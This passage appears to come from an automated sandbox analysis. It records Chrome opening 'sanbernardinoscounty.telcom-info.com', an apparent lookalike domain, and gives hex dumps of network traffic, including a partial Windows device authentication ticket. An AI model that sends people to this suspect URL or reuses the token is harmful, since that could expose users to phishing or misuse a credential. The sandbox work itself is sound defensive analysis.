                                                                          2024-10-01 22:43:18 UTC1369INData Raw: 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44
                                                                          Data Ascii: DDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDD
                                                                          2024-10-01 22:43:18 UTC1369INData Raw: 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55
                                                                          Data Ascii: UUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUU
                                                                          2024-10-01 22:43:18 UTC1369INData Raw: 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          2024-10-01 22:43:18 UTC1369INData Raw: 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 28 00 00 00 48 00 00 00 90 00 00 00 01 00 04 00 00 00 00 00 80 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33
                                                                          Data Ascii: (H"P"""""""""""""""""333
                                                                          2024-10-01 22:43:18 UTC1369INData Raw: 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44
                                                                          Data Ascii: 3333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333UUUUUUUUUUUUUUUUUDDDD


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          56192.168.2.64981640.115.3.253443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:38 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 61 31 70 46 59 4f 43 61 64 45 32 72 33 4c 39 6b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 34 34 38 62 65 31 62 66 30 37 36 38 31 30 39 0d 0a 0d 0a
                                                                          Data Ascii: CNT 1 CON 305MS-CV: a1pFYOCadE2r3L9k.1Context: 6448be1bf0768109
                                                                          2024-10-01 22:43:38 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                          2024-10-01 22:43:38 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 61 31 70 46 59 4f 43 61 64 45 32 72 33 4c 39 6b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 34 34 38 62 65 31 62 66 30 37 36 38 31 30 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 49 64 52 72 6a 6e 62 75 76 56 6b 53 7a 33 56 4c 71 52 63 4c 4c 39 73 4f 38 46 6e 4c 6f 47 49 45 33 6e 52 79 66 39 34 55 4a 63 32 2f 62 65 30 75 34 6b 6d 66 30 6c 47 5a 4d 58 2b 35 59 55 48 45 78 62 4c 6f 59 6d 65 50 78 44 7a 4a 55 2b 57 34 54 42 57 68 2f 2f 56 57 72 35 71 48 67 65 6b 33 6d 57 37 6e 6a 45 34 54 6c 62 50 77
                                                                          Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: a1pFYOCadE2r3L9k.2Context: 6448be1bf0768109<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbIdRrjnbuvVkSz3VLqRcLL9sO8FnLoGIE3nRyf94UJc2/be0u4kmf0lGZMX+5YUHExbLoYmePxDzJU+W4TBWh//VWr5qHgek3mW7njE4TlbPw
                                                                          2024-10-01 22:43:38 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 61 31 70 46 59 4f 43 61 64 45 32 72 33 4c 39 6b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 34 34 38 62 65 31 62 66 30 37 36 38 31 30 39 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: a1pFYOCadE2r3L9k.3Context: 6448be1bf0768109<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                          2024-10-01 22:43:38 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                          Data Ascii: 202 1 CON 58
                                                                          2024-10-01 22:43:38 UTC58INData Raw: 4d 53 2d 43 56 3a 20 74 70 46 31 41 39 43 42 4c 45 61 41 6c 43 34 57 68 4c 6f 41 7a 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                          Data Ascii: MS-CV: tpF1A9CBLEaAlC4WhLoAzg.0Payload parsing failed.


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:18:42:38
                                                                          Start date:01/10/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                          Imagebase:0x7ff684c40000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:2
                                                                          Start time:18:42:41
                                                                          Start date:01/10/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2188,i,10797738705276059449,12300204305592509053,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                          Imagebase:0x7ff684c40000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:3
                                                                          Start time:18:42:43
                                                                          Start date:01/10/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sanbernardinoscounty.telcom-info.com/"
                                                                          Imagebase:0x7ff684c40000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          No disassembly